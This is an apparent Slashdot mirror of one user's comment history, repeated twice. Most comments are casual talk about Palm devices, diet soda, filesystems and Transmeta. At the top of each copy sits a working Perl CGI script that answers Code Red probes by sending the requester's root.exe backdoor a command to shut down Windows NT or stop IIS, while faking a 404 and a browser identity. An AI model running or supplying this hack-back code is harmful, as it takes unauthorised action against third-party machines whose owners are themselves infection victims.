These are meant to be CGI scripts... you need to set up your web server so that any request to http://www.yourserver.com/default.ida runs this code... You can do that by mapping.ida as a CGI extension in your server and naming the file default.ida, or by aliasing/default.ida as/redcode.pl in your server's config. What will then happen is any request for default.ida (which is what the code red virus does) will result in the requestor's machine being hit with a similar request to turn it off/shut down iis. For this code here, you'll also get an entry in your server's error log so you can know what happened.
# Authored by Anthony Kilna (anthony@kilna.com) Licensed under GPL
# Change these variables to taste...
# 1 or 0 depending on whether you'd like to shut down NT entirely or just IIS
$full_shutdown = 1;
# 1 or 0 depending on whether you want to spoof a http 404 status code
$spoof_404 = 1;
# The location of a file that will be served up (if you're 404-ing this should
# look like a typical 404 message from your server for the file/default.ida)
$file = '/www/404.html';
use LWP::UserAgent;
use HTTP::Request;
# Make the HTTP header
if ($spoof_404) {
print "Status: 404 Not Found\n";
}
print "Content-type: text/html\n\n";
# Output the file to the browser
if (open FILE, $file) {
while (<FILE>) { print $_; }
close FILE;
}
# Makes it so the browser/virus isn't waiting for the outgoing request below
close STDOUT;
$server = $ENV{'REMOTE_ADDR'};
$rooturl = "http://$server/scripts/root.exe";
$connection = new LWP::UserAgent;
# Look like we're a real browser (ha!)
$connection->agent("Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)");
if ($full_shutdown) {
# Attempt to shut down NT
$command = '/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5';
}
else {
# Attempt to shut down IIS
$command = '/c+iisreset+/stop';
}
# Make the request
$response = $connection->request(new HTTP::Request GET=>"$rooturl?$command");
# See if it worked, if so report to the web server's log file
if ($response->is_success) {
if ($full_shutdown) {
print STDERR "Code red NT shutdown on $server\n";
}
else {
print STDERR "Code red IIS shutdown on $server\n";
}
}
I am by no means an expert on Canadian law, but I seem to recall reading that the ban was on caffein in citrus drinks (hence Jolt varieties are OK, but Mountain Dew isn't). Test of theory: Has anyone seen the citrus version of Jolt on Canada?
Another thing that bears mentioning is the fact that DDoS attacks can (and may already be) ack'ed before they arrive... This means only a small amount of requests would have to be issued from a moderate base of compromised systems. Stefan was suggesting that someone wanting to boost performance use HTTP to re-request page chunks that didn't arrive fully, but somehow I don't think the DDoS people really care about receiving the information intact.:)
I'm not a TCP/IP guru, but would a possible rememdy be to vary the length of data being requested, so at least the ability to pre-ack the transfer would be one step harder?
Tracking back to the attcking hosts at least provides the victim with the ability to deny access relatively local the attacking machines. Even if the attacking computers are spoofing, if you know a particular machine is being routed through, you can deny access from that router in somewhat of an automatic manner with Stefan's suggestions in place.
From what I understand of it, the "AV" associated with a drive today means something else. One of the big drive manufacturers (Quantum?) has released technology that allows the drive to both read and write simulateously... this means you can be watching one show and recording another as long as you're overwrting the old show, or some such.
When I become Dr. Evil level rich, I think I will make a pool with a glass window, in which I will put a large screen monitor. Attached to the side of the pool will be this keyboard, and some sort of touchpad mouse. That way I can access the web to look up the rules for "Marco Polo" if there's ever a dispute.
Its a trojan AND a virus. A trojan is a program that makes itself out to be something the user wants, lulling them into executing it so that it can carry out its own unauthorized actions (hard drive format, file corruption, even propigation... depends on what the trojan writer's desires are). A virus is a program that replicates itself from host to host, more often than not triggered involuntarily by a user action (usually the cause is the user executing a program that they didn't know contained the virus).
One could argue that a virus is strictly a program that embeds itself in other executable code for the sake of propigation. The only practical difference between that stricter definition and the one I'm giving here is the fact that the host the virus infects is executable machine code and not a system like the Outlook client and Windows Scripting Host that ILOVEYOU exploited. To me, either way, a system is being exploited for the sake of propigating the offending code.
ILOVEYOU made itself out to look like something the user wanted and when executed proceeded to replicate itself to other hosts. It has properties of both a Trojan and a Virus.
Microsoft bashing aside, how do we as the technical experts deal with someone without clue making a decision that heavily influences the effectiveness of a project? My biggest challenge has been finding the most appropriate and professional way to say "That would be stupid". Sometimes there's no option to speak out, indicating that its time to move on.:)
I'm also 30 lbs. down, about half way to my goal and I've only been doing this since January. The Hacker's Diet rocks, it really works if you apply it. My doctor said it was a very sensible plan too. The palm software is a great tool for tracking your daily wieght... BTW, a great use for the notes section in the software is to write your current calories for the day (that has to be why he added that but gave you so little space).
There's a little system extension called "MenuHack" which allows you to click on the title bar of the app (if it has one) to bring up the menu. That's the only metaphor from the windows interface that frustrated me when working with PalmOS, and it took me no time flat to find a fix for it. Check your local PalmOS shareware site!
You say this as if browsing the web in 240x320 is all that much better? Lets face it, any palm-sized platform is going to be unsuitable for browsing the web in any real sense. And no matter how high we drive the resolution, the only thing that will do is make the text crisper, not allow us to put more text on the screen. A two or three inch square just isn't big enough. Would you think its practical to read a newspaper if it was delivered in paperback format?
Clarity of the image is the most important factor in choosing a device. Resolution helps, but other factors are just as important... like brightness and sharpness of an image. In all fairness, anyone who's seen it says the Palm IIIc beats all of the competition hands down in those categories.
Re:laptop without screen and battery - bright idea
on
Super Tiny Espresso PC
·
· Score: 1
So instead of a perv playing with his twiddler, you're now staring blankly talking to nobody. I suppose at least the latter doen't get you arrested...
I love my e-holster. Get one. Now. No really, you won't look like a geek in it. Well, actually you will, but you won't care because the e-holster is so cool. Get one. Now.
Actually, IIRC there is a perl compiler out there... Regardless, whether the source is available or not is not the question, though it is part of the functional purpose of that which is in question, the licence. GPL doesn't only mean "source has to be included", it also means you have to include due credit to the original author, and of course redistribute the license file as well, among other things.:)
Thawte's search function is down right now, but i distinctly remember reading in one of their docs about several web client/server combinations that had problems handling wildcard certificates. And no e-commerce vendor wants to limit their audience.
I'll admit, it took me about a week to get acclaimated to the taste of saccharin/nutrasweet. But once you have reached the threshold of tolerance for the taste of artificial sweeteners, its not a bad drink. Considering the fact that I go through the better part of a six-pack a day some times, it became an absolute necessity to go diet on the sodas if I wanted to loose weight.
This sounds like the perfect food for the Hacker's Diet. It looks like alot of volume for the calorie count, and has quite a bit of nutritional value as well.
I do have to agree that this looks more like Yuppie Chow (tm) than geek food. I just don't see engineers eating alot of legumes and non-dairy cheese. It is, however, a microwavable food... and there is a certain charm to foods you've just prepared by exposing them to radiation.
Now if Mr. Adams can hook up with Pepsico to make a healthy Dorito with 100% of my daily nutritional needs, to go along with my DMD (Diet Mountain Dew, a gift from above to dieting hackers)... Then he's really got something.
I'll try it, and if its good I'll continue buying it. But I don't really know if its wise for 'ol Scot to use the Dilbert name everywhere. Expecially on something whose concept it doesn't mesh fit with, like yuppie health food. We don't want Dilbert to become so ever present that we get tired of it.
Re:Lower-case / capital letters for filenames
on
FreeBSD VM Design
·
· Score: 1
There are 3 ways to do file systems (I've used all 3):
Case Forgetting
Like DOS, you can type the filename however you want (oscillating CAPS LOCK if you like), but it's always gonna show up as uppercase in a DIR.
Case Preserving/Case Sensitive
Like UNIX, which means you can create the BAD situation of a file name that's the same except for capitalization. Why the hell would one WANT this? Filenames are supposed to provide context about the file's contents, and this does NOT serve that purpose.
Case Preserving/Case Insensitive
Like NT and 9x... sort of. I've noticed that on FAT filesystems, windows will assume that you want filenames that fit 8.3 to be displayed with an uppercase first letter and all lower after that. Annoying. But (true) Case Preserving/Case Insensitive file systems makes the most sense to me: you don't have to worry if you're opening "REAMDE" or "readme", it just works. This is probably my biggest beef with using UNIX-based systems!
I think a good point is being made here: it probably won't matter much that we have two layers of translation (Java bytecode -> x86, x86 -> TM VLIW) because of the built-in self optimizing nature of the TM processor. In fact, I imagine TM will be the best PC platform for running any sort of instruction set translation because of its "smart" self-teching method of translating. I'll bet something like the PlayStation emulator will rock on their hardware.
Of course you then update the code morphing software in your flash ROM to support IA-64.:) In reality of course, there will be significant differences in how x86 and IA-64 (Itanium... UGH) comunicate with memory and peripheral busses, so it'll probably not be as easy as that. But if intel unleashes something like an updated MMX instruction set, there's no reason the TM processor couldn't be software upgraded to handle those instructions.
I agree with you. The way I see it, all things being equal, traditional versioning and year-based versioning will both tell you what product is newer than another (assuming the same system has always been in place, i.e., there's no way to tell if Windows 3.1 or Windows 2000 is a newer product).
The year-based numbering system does have two advantages: Its more user friendly (my mom will comprehend and feel better about a version number she can associate with a real world concept like years), and it gives the user (experienced or not) a concept of when the software was released. Yes, the marketroids like it, but that doesn't mean its a useless concept.
The things that concern me though: A major revision development cycle less than one year. Red Hat 2000 1/2 anyone? And an intuitive standard for minor revisions... MS has switched from OSRx to x-th Edition on the Windows line, and uses Service Pack x on their other products. I kinda like the idea of Product 2000 Update x Patch y, which would translate well into standard version numbers (2000.x.y).
Slashdot Mirror
These are meant to be CGI scripts... you need to set up your web server so that any request to http://www.yourserver.com/default.ida runs this code... You can do that by mapping .ida as a CGI extension in your server and naming the file default.ida, or by aliasing /default.ida as /redcode.pl in your server's config. What will then happen is any request for default.ida (which is what the code red virus does) will result in the requestor's machine being hit with a similar request to turn it off/shut down iis. For this code here, you'll also get an entry in your server's error log so you can know what happened.
#!/usr/bin/perl -w
/default.ida)
# Authored by Anthony Kilna (anthony@kilna.com) Licensed under GPL
# Change these variables to taste...
# 1 or 0 depending on whether you'd like to shut down NT entirely or just IIS
$full_shutdown = 1;
# 1 or 0 depending on whether you want to spoof a http 404 status code
$spoof_404 = 1;
# The location of a file that will be served up (if you're 404-ing this should
# look like a typical 404 message from your server for the file
$file = '/www/404.html';
use LWP::UserAgent;
use HTTP::Request;
# Make the HTTP header
if ($spoof_404) {
print "Status: 404 Not Found\n";
}
print "Content-type: text/html\n\n";
# Output the file to the browser
if (open FILE, $file) {
while (<FILE>) { print $_; }
close FILE;
}
# Makes it so the browser/virus isn't waiting for the outgoing request below
close STDOUT;
$server = $ENV{'REMOTE_ADDR'};
$rooturl = "http://$server/scripts/root.exe";
$connection = new LWP::UserAgent;
# Look like we're a real browser (ha!)
$connection->agent("Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)");
if ($full_shutdown) {
# Attempt to shut down NT
$command = '/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5';
}
else {
# Attempt to shut down IIS
$command = '/c+iisreset+/stop';
}
# Make the request
$response = $connection->request(new HTTP::Request GET=>"$rooturl?$command");
# See if it worked, if so report to the web server's log file
if ($response->is_success) {
if ($full_shutdown) {
print STDERR "Code red NT shutdown on $server\n";
}
else {
print STDERR "Code red IIS shutdown on $server\n";
}
}
If you run NT and crash, would it be the "Blue 'Balls of Death"?
I am by no means an expert on Canadian law, but I seem to recall reading that the ban was on caffein in citrus drinks (hence Jolt varieties are OK, but Mountain Dew isn't). Test of theory: Has anyone seen the citrus version of Jolt on Canada?
Another thing that bears mentioning is the fact that DDoS attacks can (and may already be) ack'ed before they arrive... This means only a small amount of requests would have to be issued from a moderate base of compromised systems. Stefan was suggesting that someone wanting to boost performance use HTTP to re-request page chunks that didn't arrive fully, but somehow I don't think the DDoS people really care about receiving the information intact. :)
I'm not a TCP/IP guru, but would a possible rememdy be to vary the length of data being requested, so at least the ability to pre-ack the transfer would be one step harder?
Tracking back to the attcking hosts at least provides the victim with the ability to deny access relatively local the attacking machines. Even if the attacking computers are spoofing, if you know a particular machine is being routed through, you can deny access from that router in somewhat of an automatic manner with Stefan's suggestions in place.
From what I understand of it, the "AV" associated with a drive today means something else. One of the big drive manufacturers (Quantum?) has released technology that allows the drive to both read and write simulateously... this means you can be watching one show and recording another as long as you're overwrting the old show, or some such.
When I become Dr. Evil level rich, I think I will make a pool with a glass window, in which I will put a large screen monitor. Attached to the side of the pool will be this keyboard, and some sort of touchpad mouse. That way I can access the web to look up the rules for "Marco Polo" if there's ever a dispute.
> It's a trojan not a virus.
Its a trojan AND a virus. A trojan is a program that makes itself out to be something the user wants, lulling them into executing it so that it can carry out its own unauthorized actions (hard drive format, file corruption, even propigation... depends on what the trojan writer's desires are). A virus is a program that replicates itself from host to host, more often than not triggered involuntarily by a user action (usually the cause is the user executing a program that they didn't know contained the virus).
One could argue that a virus is strictly a program that embeds itself in other executable code for the sake of propigation. The only practical difference between that stricter definition and the one I'm giving here is the fact that the host the virus infects is executable machine code and not a system like the Outlook client and Windows Scripting Host that ILOVEYOU exploited. To me, either way, a system is being exploited for the sake of propigating the offending code.
ILOVEYOU made itself out to look like something the user wanted and when executed proceeded to replicate itself to other hosts. It has properties of both a Trojan and a Virus.
Microsoft bashing aside, how do we as the technical experts deal with someone without clue making a decision that heavily influences the effectiveness of a project? My biggest challenge has been finding the most appropriate and professional way to say "That would be stupid". Sometimes there's no option to speak out, indicating that its time to move on. :)
I'm also 30 lbs. down, about half way to my goal and I've only been doing this since January. The Hacker's Diet rocks, it really works if you apply it. My doctor said it was a very sensible plan too. The palm software is a great tool for tracking your daily wieght... BTW, a great use for the notes section in the software is to write your current calories for the day (that has to be why he added that but gave you so little space).
There's a little system extension called "MenuHack" which allows you to click on the title bar of the app (if it has one) to bring up the menu. That's the only metaphor from the windows interface that frustrated me when working with PalmOS, and it took me no time flat to find a fix for it. Check your local PalmOS shareware site!
You say this as if browsing the web in 240x320 is all that much better? Lets face it, any palm-sized platform is going to be unsuitable for browsing the web in any real sense. And no matter how high we drive the resolution, the only thing that will do is make the text crisper, not allow us to put more text on the screen. A two or three inch square just isn't big enough. Would you think its practical to read a newspaper if it was delivered in paperback format?
Clarity of the image is the most important factor in choosing a device. Resolution helps, but other factors are just as important... like brightness and sharpness of an image. In all fairness, anyone who's seen it says the Palm IIIc beats all of the competition hands down in those categories.
So instead of a perv playing with his twiddler, you're now staring blankly talking to nobody. I suppose at least the latter doen't get you arrested...
I love my e-holster. Get one. Now. No really, you won't look like a geek in it. Well, actually you will, but you won't care because the e-holster is so cool. Get one. Now.
Actually, IIRC there is a perl compiler out there... Regardless, whether the source is available or not is not the question, though it is part of the functional purpose of that which is in question, the licence. GPL doesn't only mean "source has to be included", it also means you have to include due credit to the original author, and of course redistribute the license file as well, among other things. :)
Thawte's search function is down right now, but i distinctly remember reading in one of their docs about several web client/server combinations that had problems handling wildcard certificates. And no e-commerce vendor wants to limit their audience.
(Placing tongue firmly in cheek)
Just use Java! :)
I'll admit, it took me about a week to get acclaimated to the taste of saccharin/nutrasweet. But once you have reached the threshold of tolerance for the taste of artificial sweeteners, its not a bad drink. Considering the fact that I go through the better part of a six-pack a day some times, it became an absolute necessity to go diet on the sodas if I wanted to loose weight.
This sounds like the perfect food for the Hacker's Diet. It looks like alot of volume for the calorie count, and has quite a bit of nutritional value as well.
I do have to agree that this looks more like Yuppie Chow (tm) than geek food. I just don't see engineers eating alot of legumes and non-dairy cheese. It is, however, a microwavable food... and there is a certain charm to foods you've just prepared by exposing them to radiation.
Now if Mr. Adams can hook up with Pepsico to make a healthy Dorito with 100% of my daily nutritional needs, to go along with my DMD (Diet Mountain Dew, a gift from above to dieting hackers)... Then he's really got something.
I'll try it, and if its good I'll continue buying it. But I don't really know if its wise for 'ol Scot to use the Dilbert name everywhere. Expecially on something whose concept it doesn't mesh fit with, like yuppie health food. We don't want Dilbert to become so ever present that we get tired of it.
There are 3 ways to do file systems (I've used all 3):
Case Forgetting
Like DOS, you can type the filename however you want (oscillating CAPS LOCK if you like), but it's always gonna show up as uppercase in a DIR.
Case Preserving/Case Sensitive
Like UNIX, which means you can create the BAD situation of a file name that's the same except for capitalization. Why the hell would one WANT this? Filenames are supposed to provide context about the file's contents, and this does NOT serve that purpose.
Case Preserving/Case Insensitive
Like NT and 9x... sort of. I've noticed that on FAT filesystems, windows will assume that you want filenames that fit 8.3 to be displayed with an uppercase first letter and all lower after that. Annoying. But (true) Case Preserving/Case Insensitive file systems makes the most sense to me: you don't have to worry if you're opening "REAMDE" or "readme", it just works. This is probably my biggest beef with using UNIX-based systems!
I think a good point is being made here: it probably won't matter much that we have two layers of translation (Java bytecode -> x86, x86 -> TM VLIW) because of the built-in self optimizing nature of the TM processor. In fact, I imagine TM will be the best PC platform for running any sort of instruction set translation because of its "smart" self-teching method of translating. I'll bet something like the PlayStation emulator will rock on their hardware.
Of course you then update the code morphing software in your flash ROM to support IA-64. :) In reality of course, there will be significant differences in how x86 and IA-64 (Itanium... UGH) comunicate with memory and peripheral busses, so it'll probably not be as easy as that. But if intel unleashes something like an updated MMX instruction set, there's no reason the TM processor couldn't be software upgraded to handle those instructions.
And a version for the vTech Helio would be cool too! :) Brand new SDK with sparse apps available so far (wide open territory)
Whatever happened to Battle Chess?
I agree with you. The way I see it, all things being equal, traditional versioning and year-based versioning will both tell you what product is newer than another (assuming the same system has always been in place, i.e., there's no way to tell if Windows 3.1 or Windows 2000 is a newer product).
The year-based numbering system does have two advantages: Its more user friendly (my mom will comprehend and feel better about a version number she can associate with a real world concept like years), and it gives the user (experienced or not) a concept of when the software was released. Yes, the marketroids like it, but that doesn't mean its a useless concept.
The things that concern me though: A major revision development cycle less than one year. Red Hat 2000 1/2 anyone? And an intuitive standard for minor revisions... MS has switched from OSRx to x-th Edition on the Windows line, and uses Service Pack x on their other products. I kinda like the idea of Product 2000 Update x Patch y, which would translate well into standard version numbers (2000.x.y).